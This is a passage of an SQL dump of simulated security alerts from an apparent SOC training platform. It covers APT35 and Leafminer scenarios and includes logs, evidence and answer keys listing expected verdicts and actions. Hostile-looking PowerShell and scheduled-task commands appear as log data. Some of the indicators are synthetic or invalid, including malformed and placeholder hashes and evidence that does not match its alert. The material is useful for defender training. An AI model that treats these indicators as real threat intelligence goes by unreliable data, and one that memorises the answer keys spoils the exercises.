(1105, 'Magic Hound Malware Execution', 'high', 'Endpoint Detection and Response (EDR)', 'The Magic Hound malware was executed on the compromised system after the target clicked a malicious link. The malware established a foothold within the organization\'s network, potentially allowing for further malicious activities.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', 116, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\magic_hound_payload.ps1\",\"file_hash\":\"2f8e92b7c8c7b7e3aa8c3e5d7e9e4a2f\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"files_dropped\":[{\"filename\":\"magic_hound_payload.ps1\",\"location\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\\",\"hash\":\"2f8e92b7c8c7b7e3aa8c3e5d7e9e4a2f\"}]}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address range\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Magic Hound activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2f8e92b7c8c7b7e3aa8c3e5d7e9e4a2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Magic Hound payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"magic_hound_payload.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used by Magic Hound\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Employee account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1106, 'Persistence Using Cloud Services', 'high', 'Cloud Access Security Broker (CASB)', 'APT35 is leveraging legitimate cloud services to establish command and control channels, maintaining persistent access to compromised systems. The operation involves using a cloud storage service to host malicious scripts that are periodically executed by the compromised host.', 'Persistence', 'T1136 - Create Account', 1, 'new', NULL, '{\"event_id\":\"CASB-2023-10-03-123456\",\"timestamp\":\"2023-10-03T14:23:45Z\",\"source_ip\":\"203.0.113.56\",\"internal_ip\":\"10.10.10.25\",\"username\":\"compromised_user\",\"file_sha256\":\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\",\"filename\":\"malicious_script.js\",\"cloud_service\":\"cloudstorage.example.com\",\"action\":\"File Upload\",\"description\":\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known APT35 command and control IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account showing unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT35 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains scripts used for maintaining persistent access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.820Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":\\\"CASB-2023-10-03-123456\\\",\\\"timestamp\\\":\\\"2023-10-03T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.56\\\",\\\"internal_ip\\\":\\\"10.10.10.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file_sha256\\\":\\\"d2d2f5e8b6d8c3c4e5f5f6a7a8a9b0b1c2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7\\\",\\\"filename\\\":\\\"malicious_script.js\\\",\\\"cloud_service\\\":\\\"cloudstorage.example.com\\\",\\\"action\\\":\\\"File Upload\\\",\\\"description\\\":\\\"Malicious script uploaded to cloud storage, used for maintaining persistent access.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1107, 'Unauthorized Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'The attackers exploited stolen credentials to move laterally within the network, targeting critical systems within the telecommunications infrastructure. This activity indicates a sophisticated actor with a detailed understanding of the network topology.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-09-14T15:23:45Z\",\"source_ip\":\"192.168.1.23\",\"destination_ip\":\"192.168.2.45\",\"external_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"event\":\"Lateral Movement\",\"protocol\":\"SMB\",\"file_hash\":\"f2c7e3c9d5b6a8e1f8e4d2b3a9c1f7e8\",\"filename\":\"important_document.docx\",\"action\":\"login_success\",\"description\":\"Successful login from 192.168.1.23 to 192.168.2.45 using stolen credentials.\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Critical system targeted by lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"compromised\",\"details\":\"User account credentials were stolen and used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"f2c7e3c9d5b6a8e1f8e4d2b3a9c1f7e8\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File hash related to lateral movement activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1108, 'Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP) System', 'APT35 attempts to exfiltrate sensitive aerospace data through encrypted channels to external servers, marking the final stage of their operation.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T18:45:32Z\",\"src_ip\":\"10.0.1.45\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_user\":\"jdoe@aerospacecorp.com\",\"transfer_method\":\"Encrypted Channel\",\"destination_domain\":\"malicious-exfiltration.net\",\"file_name\":\"confidential_aerospace_data.zip\",\"file_hash\":\"3c6e0b8a9c15224a8228b9a98ca1531d\",\"action\":\"Blocked\",\"alert_id\":\"DLP-2023-Exfil-005\",\"detection_system\":\"DLP System v3.2\"}', '2026-01-28 00:08:43', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT35 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.net\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by APT35 for data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_aerospace_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file identified in exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3c6e0b8a9c15224a8228b9a98ca1531d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Hash of the sensitive file being exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.823Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T18:45:32Z\\\",\\\"src_ip\\\":\\\"10.0.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"src_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"transfer_method\\\":\\\"Encrypted Channel\\\",\\\"destination_domain\\\":\\\"malicious-exfiltration.net\\\",\\\"file_name\\\":\\\"confidential_aerospace_data.zip\\\",\\\"file_hash\\\":\\\"3c6e0b8a9c15224a8228b9a98ca1531d\\\",\\\"action\\\":\\\"Blocked\\\",\\\"alert_id\\\":\\\"DLP-2023-Exfil-005\\\",\\\"detection_system\\\":\\\"DLP System v3.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1109, 'Initial Access via Phishing Email', 'high', 'Email Gateway Logs', 'Leafminer initiates its attack vector by sending spear-phishing emails to employees in targeted organizations, embedding malicious links that lead to the installation of the Total Commander RAT.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:07Z\",\"email_subject\":\"Urgent: Important Update Required\",\"sender_email\":\"hr_department@trustedcompany.com\",\"recipient_email\":\"john.doe@targetcompany.com\",\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.1.15\",\"malicious_url\":\"http://malicious-update.com/secure\",\"attachment\":\"Update_Your_Security.pdf\",\"attachment_hash\":\"2f4e54b5f6d8e23a1b3c9d4f7a8e5d9c7e6f1b3a4c8f9e0d2f1e4d5b6f7c8e9d\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted user\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-update.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"2f4e54b5f6d8e23a1b3c9d4f7a8e5d9c7e6f1b3a4c8f9e0d2f1e4d5b6f7c8e9d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash matches Total Commander RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.825Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1110, 'Execution of Total Commander RAT', 'high', 'Endpoint Detection and Response (EDR)', 'The Total Commander Remote Access Tool (RAT) was executed on an endpoint following the clicking of a malicious link. This has allowed the Leafminer group to potentially execute commands remotely and establish a foothold within the network.', 'Malware Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:37Z\",\"event_type\":\"Malware Execution\",\"host\":{\"hostname\":\"workstation-23\",\"ip\":\"192.168.1.45\"},\"user\":\"jdoe\",\"process\":{\"name\":\"cmd.exe\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c start totalcmd.exe\",\"pid\":4567},\"network\":{\"dst_ip\":\"203.0.113.52\",\"dst_port\":443,\"protocol\":\"TCP\"},\"file\":{\"name\":\"totalcmd.exe\",\"path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\totalcmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.52\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Leafminer group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Total Commander RAT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"totalcmd.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Downloaded executable file potentially used for remote access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1111, 'Establishing Persistence via Scheduled Tasks', 'high', 'Windows Event Logs', 'To ensure continued access, Leafminer sets up scheduled tasks that persistently re-launch the RAT, even after system reboots. The task was configured using a known malicious binary.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":4698,\"TaskCategory\":\"Scheduled Task Created\",\"ProviderName\":\"Microsoft-Windows-Security-Auditing\",\"TimeCreated\":\"2023-10-20T14:22:15.000Z\",\"EventRecordID\":123456,\"ProcessName\":\"schtasks.exe\",\"UserData\":{\"TaskName\":\"\\\\LeafminerPersistenceTask\",\"TaskContent\":{\"Command\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Arguments\":\"/c C:\\\\Users\\\\Public\\\\leafminer_rat.exe\"}},\"ExecutionInfo\":{\"CreatorUser\":\"compromised_user\",\"CreatorDomain\":\"CORP\"},\"NetworkInfo\":{\"SourceIP\":\"10.0.0.15\",\"AttackerIP\":\"203.0.113.45\"},\"FileHash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"FileName\":\"leafminer_rat.exe\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Leafminer RAT binary.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit Logs\",\"verdict\":\"internal\",\"details\":\"User account used for suspicious task creation.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"leafminer_rat.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Lab\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with Leafminer RAT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 